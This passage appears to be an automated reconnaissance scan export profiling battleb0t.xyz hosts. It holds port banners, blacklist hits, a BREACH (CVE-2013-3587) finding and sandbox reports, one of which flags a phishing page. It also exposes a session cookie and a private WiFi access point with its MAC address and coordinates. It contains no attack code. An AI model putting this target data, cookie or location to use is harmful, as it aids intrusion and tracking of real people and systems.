Description: The HTTPS protocol, as used in unspecified web applications, can encrypt compressed data without properly obfuscating the length of the unencrypted data, which makes it easier for man-in-the-middle attackers to obtain plaintext secret values by observing length differences during a series of guesses in which a string in an HTTP request URL potentially matches an unknown string in an HTTP response body, aka a "BREACH" attack, a different issue than CVE-2012-4929. | oldfluid.battleb0t.xyz |
| 2023-05-12 02:44:22 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | github.com | 185.199.108.153 |
| 2023-05-12 02:44:49 | Company Name | No | Company Name Extractor | 0 | 0 | 3 | 0 | None | GitHub\, Inc. | C=US,ST=California,L=San Francisco,O=GitHub\, Inc.,CN=*.github.io |
| 2023-05-12 03:01:22 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.208): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:24:49 | Country | No | Country Name Extractor | 0 | 0 | 4 | 0 | None | Lithuania | 000.lt |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | thuis (Net ID: 00:11:6B:12:CA:A6) | 50.8897, 6.0563 |
| 2023-05-12 02:44:40 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | Netlify | funny.battleb0t.xyz |
| 2023-05-12 02:44:40 | Affiliate - Internet Name | No | DNS Resolver | 1 | 0 | 3 | 0 | None | 220.30.196.104.bc.googleusercontent.com | 104.196.30.220 |
| 2023-05-12 02:54:48 | Open TCP Port Banner | No | Censys | 0 | 0 | 3 | 0 | None | HTTP/1.1 404 Not Found
Server: Netlify
X-Nf-Request-Id: 01H0694HWAMG6RHJEVW16FQRHY
Date: <REDACTED>
Content-Length: 0
| 34.148.97.127 |
| 2023-05-12 03:18:47 | Wikipedia Page Edit | No | Wikipedia Edits | 0 | 0 | 5 | 0 | None | https://en.wikipedia.org/w/index.php?title=Talk:Baden-W%C3%BCrttemberg_Cooperative_State_University&diff=506884727 | Altpapier |
| 2023-05-12 02:55:18 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://sable.madmimi.com/c/350165?id=104678088.24981.1.6e512bc9d4841698496893609f155382', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"addtocalendar.com"\n "code.jivosite.com"\n "images.dmca.com"\n "sable.madmimi.com"\n "secure.comodo.com"\n "secure.trust-provider.com"\n "www.audiocompliance.com"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "TarFD72.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"198.71.248.145:443"\n "35.162.153.72:443"\n "142.250.188.10:443"\n "13.227.74.14:443"\n "3.231.186.5:443"\n "151.139.128.10:443"\n "52.92.250.112:443"\n "104.17.24.14:443"\n "185.199.109.153:443"\n "104.37.183.1:443"\n 
"142.251.46.227:443"\n "142.250.189.195:443"\n "91.199.212.148:443"\n "142.251.32.46:443"\n "5.101.71.73:443"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_ea8_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_ea8_IESQMMUTEX_0_519"\n "IsoScope_ea8_IESQMMUTEX_0_303"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_ea8_IESQMMUTEX_0_331"\n "UpdatingNewTabPageData"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_ea8_IE_EarlyTabStart_0xa50_Mutex"\n "IsoScope_ea8_ConnHashTable<3752>_HashTable_Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3752"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3752"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"CabFD71.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', 
u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "bootstrap-side-notes_1_.css" has type "ASCII text with CRLF line terminators"- [targetUID: N/A]\n "1Ptxg8zYS_SKggPN4iEgvnHyvveLxVvoorCIPrc_1_.woff" has type "Web Open Font Format TrueType length 25360 version 1.1"- [targetUID: N/A]\n "swiper_1_.css" has type "ASCII text with very long lines with CRLF line terminators"- [targetUID: N/A]\n "landingv4_1_.css" has type "assembler source ASCII text with CRLF line terminators"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002916]\n "dark_1_.css" has type "ASCII text with CRLF line terminators"- [targetUID: N/A]\n "_A32800A3-ADBF-11ED-B70F-080027E847F6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "customv3_1_.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- [targetUID: N/A]\n "1Ptxg8zYS_SKggPN4iEgvnHyvveLxVsEpbCIPrc_1_.woff" has type "Web Open Font Format TrueType length 26196 version 1.1"- [targetUID: N/A]\n "logo_1_.png" has type "PNG image data 551 x 197 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "www.google_1_.xml" has type "ASCII text with no line terminators"- [targetUID: N/A]\n "cart-banner2_1_.jpg" has type "JPEG image data JFIF standard 1.01 resolution (DPI) density 96x96 segment length 16 Exif Standard: [TIFF image data little-endian direntries=4 xresolution=62 yresolution=70 resolutionunit=2] baseline precision 8 480x150 components 3"- [targetUID: N/A]\n "KFOlCnqEu92Fr1MmYUtfBBc9_1_.ttf" has type "TrueType Font data 18 tables 1st "GDEF" 8 names Microsoft language 0x409 Copyright 2011 Google Inc. 
All Rights Reserved.Roboto BlackRegularVersion 2.137; 2017Roboto-Bla"- [targetUID: N/A]\n "5e88b89fab8bfa2e7a96214dc1e5c22f_1_.png" has type "PNG image data 118 x 106 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "timepicker_1_.js" has type "UTF-8 Unicode text with very long lines with no line terminators"- [targetUID: N/A]\n "~DFFB8CE66BE3105BA6.TMP" has type "data"- Location: [%TEMP%\\~DFFB8CE66BE3105BA6.TMP]- [targetUID: 00000000-00003752]\n "analytics_3_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "RecoveryStore._A32800A1-ADBF-11ED-B70F-080027E847F6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Decrypted SSL network traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET /c/350165?id=104678088.24981.1.6e512bc9d4841698496893609f155382 HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: sable.madmimi.com\nDNT: 1\nConnection: Keep-Alive"\n "HTTP/1.1 302 Found\nContent-Length: 0\nConnection: keep-alive\nStatus: 302 Found\nLocation: https://www.audiocompliance.com/product/ac/form-941-compliance-2022\nDate: Thu, 16 Feb 2023 07:03:40 GMT\nX-Powered-By: Phusion Passenger(R) Enterprise 6.0.17\nServer: nginx + Phusion Passenger(R) 6.0.17"\n "GET /product/ac/form-941-compliance-2022 HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: Keep-Alive\nHost: 
www.audiocompliance.com"\n [binary fragment: not reproducible as text]\n "HTTP/1.1 200 OK\nServer: nginx/1.4.6 (Ubuntu)\nDate: Thu, 16 Feb 2023 07:03:43 GMT\nContent-Type: text/html; charset=UTF-8\nTransfer-Encoding: chunked\nConnection: keep-alive\nVary: Accept-Encoding\nX-Powered-By: PHP/5.5.9-1ubuntu4.21\nSet-Cookie: ci_session=6630a58f9ebedd1dbe62a5bc51e7fc254a50f984; expires=Fri, 17-Feb-2023 07:03:43 GMT; Max-Age=86400; path=/; HttpOnly\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\nPragma: no-cache\nContent-Encoding: gzip\n\n3e6e\n[gzip-compressed chunk body: binary data omitted, not reproducible as text] | 185.199.109.153 |
| 2023-05-12 02:54:30 | Operating System | No | Censys | 0 | 0 | 3 | 0 | None | Debian Linux 10.2 | 64.226.81.43 |
| 2023-05-12 02:55:09 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'http://nerro13.github.io/', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"nerro13.github.io"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"nerro13.github.io"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.109.153:80"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': 
u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_968_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "IsoScope_968_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "UpdatingNewTabPageData"\n "Local\\ZonesCacheCounterMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_968_IESQMMUTEX_0_331"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_968_IE_EarlyTabStart_0xc70_Mutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2408"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_968_ConnHashTable<2408>_HashTable_Mutex"\n "IsoScope_968_IESQMMUTEX_0_303"\n "Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "~DF99267F6226AC7DEA.TMP" has type "data"- Location: [%TEMP%\\~DF99267F6226AC7DEA.TMP]- [targetUID: 00000000-00002408]\n "_E2B86EC9-B454-11ED-823B-080027D228E3_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "~DFC052ACEB9DBBAC98.TMP" has type "data"- Location: [%TEMP%\\~DFC052ACEB9DBBAC98.TMP]- [targetUID: 00000000-00002408]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" 
has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "TPU4PQUX.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\TPU4PQUX.txt]- [targetUID: 00000000-00002408]\n "~DF438050EC9ECB4A74.TMP" has type "data"- Location: [%TEMP%\\~DF438050EC9ECB4A74.TMP]- [targetUID: 00000000-00002408]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00002408]\n "RecoveryStore._E2B86EC7-B454-11ED-823B-080027D228E3_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "8ACOQPI4.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\8ACOQPI4.txt]- [targetUID: 00000000-00002408]\n "64ZQIBC4.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\64ZQIBC4.txt]- [targetUID: 00000000-00002368]\n "favicon_1_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "~DFD098EAB3ED553EDC.TMP" has type "data"- Location: [%TEMP%\\~DFD098EAB3ED553EDC.TMP]- [targetUID: 00000000-00002408]\n "favicon_2_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "_1F214282-B457-11ED-823B-080027D228E3_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "search_1_.json" has type "JSON data"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://nerro13.github.io/"\n Pattern match: "http://nerro13.github.io"\n Heuristic match: "nerro13.github.io"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-0', u'name': u'Sample was 
identified as malicious by at least one Antivirus engine', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 0, u'threat_level': 1, u'type': 12, u'description': u'7/90 Antivirus vendors marked sample as malicious (7% detection rate)'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-6', u'name': u'Found an IP/URL artifact that was identified as malicious by at least three reputation engines', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 12, u'description': u'7/90 reputation engines marked "http://nerro13.github.io/" as malicious (7% detection rate)\n 7/90 reputation engines marked "http://nerro13.github.io" as malicious (7% detection rate)'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-5', u'name': u'Sample was identified as malicious by a trusted Antivirus engine', u'attck_id_wiki': None, u'threat_level_human': u'malicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 2, u'type': 12, u'description': u'No specific details available'}], u'threat_level': 2, u'size': None, u'job_id': u'63f8dbfa2553cc49d7017635', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [{u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'suspicious_identifiers': [], u'attck_id': u'T1105', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Ingress Tool Transfer', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}, {u'parent': {u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'technique': u'Application Layer Protocol', u'attck_id': u'T1071'}, u'attck_id_wiki': 
u'https://attack.mitre.org/techniques/T1071/004', u'suspicious_identifiers': [], u'attck_id': u'T1071.004', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'DNS', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}, {u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'suspicious_identifiers': [], u'attck_id': u'T1071', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Application Layer Protocol', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}], u'certificates': [], u'hosts': [u'185.199.109.153'], u'sha256': u'f995a25ba6423268bc0802ef0e448acc6e53a3d5d5bc1fb0bc0ab30a5474f813', u'sha512': u'f2f8ebf1f38c5b60b4222bf3ddc388e24d2803a222851791969b2135e908709b290076559ff2097ec884b5c0df35646ed8d8d8c307297cdd2e8c5d60256c5e07', u'image_file_characteristics': [], u'submissions': [{u'url': u'http://nerro13.github.io/', u'submission_id': u'63f8dbfa2553cc49d7017636', u'created_at': u'2023-02-24T15:47:06+00:00', u'filename': None}], u'analysis_start_time': u'2023-02-24T15:52:38+00:00', u'tags': [u'phishing'], u'imphash': u'Unknown', u'total_network_connections': 1, u'av_detect': 4, u'machine_learning_models': [], u'total_signatures': 10, u'image_base': None, u'error_origin': None, u'ssdeep': u'Unknown', u'entrypoint_section': None, u'md5': u'c2a8a96e599a43bdf2bf5ad44d2dce1d', u'network_mode': u'default', u'processes': [], u'sha1': u'2899a751e27c184052242cb5db2ef2689c79b9ec', u'url_analysis': True, u'type': None, u'file_metadata': None, u'dll_characteristics': [], u'vx_family': u'Phishing site', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'verdict': u'malicious', u'minor_os_version': None, u'domains': [u'nerro13.github.io'], u'extracted_files': [], u'type_short': []}] | 185.199.109.153 |
| 2023-05-12 03:06:21 | Vulnerability - CVE Medium | Yes | Tool - testssl.sh | 0 | 0 | 2 | 0 | None | CVE-2013-3587
https://nvd.nist.gov/vuln/detail/CVE-2013-3587
Score: 5.9
Description: The HTTPS protocol, as used in unspecified web applications, can encrypt compressed data without properly obfuscating the length of the unencrypted data, which makes it easier for man-in-the-middle attackers to obtain plaintext secret values by observing length differences during a series of guesses in which a string in an HTTP request URL potentially matches an unknown string in an HTTP response body, aka a "BREACH" attack, a different issue than CVE-2012-4929. | funny.battleb0t.xyz |
| 2023-05-12 02:45:27 | Physical Location | No | ipapi.co | 0 | 0 | 3 | 0 | None | Toronto, Ontario, ON, Canada, CA | 172.67.168.252 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Career.habr (Category: business)
https://career.habr.com/login | login |
| 2023-05-12 03:01:22 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.210): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:54:17 | BGP AS Membership | No | Censys | 0 | 0 | 4 | 0 | None | 13335 | 2606:4700:3037::6815:470e |
| 2023-05-12 03:01:06 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.114): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:51:08 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://this.props.pagesize/2)),e.currentdatapageendindex=math.min(e.currentdatapagestartindex+this.props.pagesize,this.props.rows.length-1),r=!0', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 26, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://nagisa-clinic.jp/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"SM0:1464:304:WilStaging_02"\n "Local\\SM0:1464:120:WilError_01"\n "SM0:1464:120:WilError_01"\n "Local\\SM0:1464:304:WilStaging_02"\n "InternetShortcutMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"210.224.185.183:443"\n "138.91.254.96:443"\n "104.26.7.173:443"\n "104.18.11.207:443"\n "142.251.46.202:443"\n "185.199.108.153:443"\n "142.250.191.67:443"\n "142.250.189.170:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"ajaxzip3.github.io"\n "api.edgeoffer.microsoft.com"\n 
"code.ionicframework.com"\n "fonts.googleapis.com"\n "fonts.gstatic.com"\n "maps.googleapis.com"\n "nagisa-clinic.jp"\n "netdna.bootstrapcdn.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string ""paypal.com"," (Indicator: "dir "; File: "wallet-checkout-eligible-sites-pre-stable.json")\n Found string ""baysidebuddy.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""comeherebuddy.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""www.facebook.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""linkedin.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")'}, {u'category': u'Unusual Characteristics', u'origin': u'File/Memory', u'identifier': u'string-23', u'name': u'Detected known bank URL artifact', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'""manitobaharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""highkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""mandalascrubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""primalharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""amazingclubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""purehockey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""order.firehousesubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""cousinssubs.com"," (Source: 
wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""digikey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""hockeymonkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""4amscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""6whiskey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""99centsubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""allieandmickey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""alteregoscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""annabelbleu.com"," (Source: wallet-pre-stable.json, Indicator: "leu.com")\n ""aspirefashionscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""augustbleu.com"," (Source: wallet-pre-stable.json, Indicator: "leu.com")\n ""bananasmonkey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""baseballmonkey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"shopping.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\4144_1312124947\\shopping.js]- [targetUID: 00000000-00004144]\n "f_0004d6" has type "PNG image data 2000 x 1000 8-bit/color RGBA non-interlaced"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_0004d6]- [targetUID: 00000000-00007688]\n "data_2" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_2]- [targetUID: 00000000-00007688]\n "f_0004d5" has type "gzip compressed data from Unix original 
size modulo 2^32 4133692"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_0004d5]- [targetUID: 00000000-00007688]\n "Ruleset Data" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\scoped_dir4144_1094547702\\Ruleset Data]- [targetUID: 00000000-00004144]\n "f_0004d4" has type "gzip compressed data from Unix original size modulo 2^32 3947552"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_0004d4]- [targetUID: 00000000-00007688]\n "wallet-stable.json" has type "ASCII text"- [targetUID: 00000000-00004144]\n "wallet.bundle.js" has type "UTF-8 Unicode text with very long lines with no line terminators"- [targetUID: N/A]\n "Filtering Rules" has type "data"- Location: [%TEMP%\\4144_1762870862\\Filtering Rules]- [targetUID: 00000000-00004144]\n "edge_driver.js" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%TEMP%\\4144_1474562033\\edge_driver.js]- [targetUID: 00000000-00004144]\n "f_0004cf" has type "Web Open Font Format (Version 2) CFF length 1653848 version 1.262"- Location: 